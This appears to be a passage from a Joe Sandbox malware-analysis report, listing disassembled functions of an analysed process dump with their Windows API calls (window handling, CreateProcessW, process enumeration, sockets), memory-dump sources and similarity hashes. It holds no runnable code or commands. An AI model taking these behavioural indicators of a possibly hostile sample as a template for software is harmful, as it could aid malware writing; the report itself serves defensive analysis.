                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90213BB1706615CFDB18DB2AF995B7537E0BBC4315F04A15DE602BB2A1DBB09C48CB00
                                                                                                                                                                                                                                                                                                    Function 00EB6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EB6360
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EB638D
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00EB639C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 43e0f99010d204ba9f277471b1b4fa11951914c1860019467daf55c4ebef2898
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a07fb2a1bef6bc21d86dfaec590ed7b2130409c6adf50f0d057cd4041250f49
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43e0f99010d204ba9f277471b1b4fa11951914c1860019467daf55c4ebef2898
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8015B32505218EFDB219F11DC84FEFBBB4FB44355F1080A9E949E6150DB348A85EF21
                                                                                                                                                                                                                                                                                                    Function 00EB823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,00EF28E0,00EBAD55,000000FC,?,00000000,00000000,?), ref: 00EB823F
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00EB8247
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00EB82B4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 3601265619-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: a94fb59103ea9dd1f394e7bfbc9cd03a085d87b0b608319e11bdf48cd98bf44e
                                                                                                                                                                                                                                                                                                    • Instruction ID: af1d9f700323c7e58e85c474050c2479029ccbd5ba801ec85e3e3905b3cdd5ff
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a94fb59103ea9dd1f394e7bfbc9cd03a085d87b0b608319e11bdf48cd98bf44e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76015231602910DFD3259B69D954AA633EAEBC9324F14526DE616A73B0DF316C0BCB40
                                                                                                                                                                                                                                                                                                    Function 00EB8526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(?), ref: 00EB8576
                                                                                                                                                                                                                                                                                                    • CreateAcceleratorTableW.USER32(00000000,?,?,?,00E9BE96,00000000,00000000,?,00000001,00000002), ref: 00EB858C
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32(?,00E9BE96,00000000,00000000,?,00000001,00000002), ref: 00EB8595
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 986409557-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: be080dba6d9d426b8a0693db51a90cadf6476f4f4fc99dbc78e0510c5443b1bb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6485c6fed89bc0f8fc68479f31f9467f5eab277470e45b325e1837fdc73f6344
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be080dba6d9d426b8a0693db51a90cadf6476f4f4fc99dbc78e0510c5443b1bb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F012D30502704DFCB34DF6AED84AA677A5FB84325F14961EE611A73B0DB70A998CF80
                                                                                                                                                                                                                                                                                                    Function 00EB8BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EF4038,00EF407C), ref: 00EB8C1A
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00EB8C2C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                    • String ID: 8@$|@
                                                                                                                                                                                                                                                                                                    • API String ID: 3712363035-2203533388
                                                                                                                                                                                                                                                                                                    • Opcode ID: e789fc49072fcedc2db399fe1ab6b6b33f3685dc04ca8f35b8dc0902b781f7f0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 251750062d7d2e8dd5a4925a20f4ce7ae9c0a135fe01d42238a8dec4aaee61c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e789fc49072fcedc2db399fe1ab6b6b33f3685dc04ca8f35b8dc0902b781f7f0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92F054F2645314BEE3106B626C46F773E9CEB54350F411021BB08F51D2DA764C04C6BA
                                                                                                                                                                                                                                                                                                    Function 00E8096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: f5902ab3b2e192b28b7cf5cca0837eaa4bd5c63718189f060599f7766654166a
                                                                                                                                                                                                                                                                                                    • Instruction ID: f0d5eda3bdbe15f0822b6a60be52a07d9ecd3e874d88559f67d10e38d5090112
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5902ab3b2e192b28b7cf5cca0837eaa4bd5c63718189f060599f7766654166a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C16B75A0020AEFDB54DF94C894EAEB7B5FF48708F209598E409EB251D731EE85CB90
                                                                                                                                                                                                                                                                                                    Function 00E541F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfc21554c8e7614006d393d0cc62b237e8d6864d53d5055d6a287a9d5dadf479
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEA18BB29403859FDB11DF18C8917AEBBE0EF1131DF1459ADED95BB2D1C2388989C750
                                                                                                                                                                                                                                                                                                    Function 00E80D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80EE0
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80EF8
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00EBDCE0,000000FF,?,00000000,00000800,00000000,?,00EC0BD4,?), ref: 00E80F1D
                                                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00E80F3E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0051807bb4a290be84f12d560acf539c13e69c12159c06480dcdf9a7c8cf8077
                                                                                                                                                                                                                                                                                                    • Instruction ID: 64420e8578502c273bd473c9dc420bcafad39c95c9487b20fac272361c78e33e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0051807bb4a290be84f12d560acf539c13e69c12159c06480dcdf9a7c8cf8077
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5810971A00109EFCB54DF94C984EEEB7B9FF89315F204558E51ABB250DB71AE0ACB60
                                                                                                                                                                                                                                                                                                    Function 00EAB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00EAB10C
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00EAB11A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00EAB1FC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EAB20B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E64D73,?), ref: 00E3E395
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a7db84b9d44f809e8bbfd24faeaeff560461f7ebdc7c7555194cafdd3fccae92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 60073dcde06fd8c6d5a049faf36811c243fe3a006373f7d618317542bdcc228b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7db84b9d44f809e8bbfd24faeaeff560461f7ebdc7c7555194cafdd3fccae92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53513CB1508310AFD310EF24DC86A5BBBE8FF89754F40592DF585A7252EB70E905CB92
                                                                                                                                                                                                                                                                                                    Function 00E61711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a2f24118c16ec18e4eb28fe1451fce70b7443708b81336ce60e9677284a5f766
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5bc14b3c1def22b955451819bf65a60b6da4468c156c4460a93e4c8a6ef6187
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2f24118c16ec18e4eb28fe1451fce70b7443708b81336ce60e9677284a5f766
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB415E31580100AFDB26BEBDBC42ABE36E4EF467B0F1C26E6F814F7191D634480152A1
                                                                                                                                                                                                                                                                                                    Function 00EA2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00EA255A
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA2568
                                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EA25E7
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA25F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec98d4641b6f48349d74208fe4496287e02a3b8c48940b1f73ceca91c7a15868
                                                                                                                                                                                                                                                                                                    • Instruction ID: f32efe93803735d9a9d3f231f4a8b383014b13257304c380b49215272599c156
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec98d4641b6f48349d74208fe4496287e02a3b8c48940b1f73ceca91c7a15868
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A41D134A00210AFE720AF24D886F2677E5AB49718F54D49CFA59AF3D2D772ED41CB90
                                                                                                                                                                                                                                                                                                    Function 00EB6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00EB6D1A
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00EB6D4D
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EB6DBA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5efc77100e15a69d744b5a8a83637235c9b7accfbc38eb7621c9b8bd71593691
                                                                                                                                                                                                                                                                                                    • Instruction ID: f793b1b167c86fc7fdd5919dc4fe3bb15f8a5ef7b1ce667ba97cf497a7f5f0d2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5efc77100e15a69d744b5a8a83637235c9b7accfbc38eb7621c9b8bd71593691
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8513A34A00209AFCF24DF64D8819EF7BB6FB84324F209559F915AB2A0D774EE81CB50
                                                                                                                                                                                                                                                                                                    Function 00E5B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: ef4e2a8a3824c94450eac92b58d4a9481853eba96015b1820ab52d66bc548b75
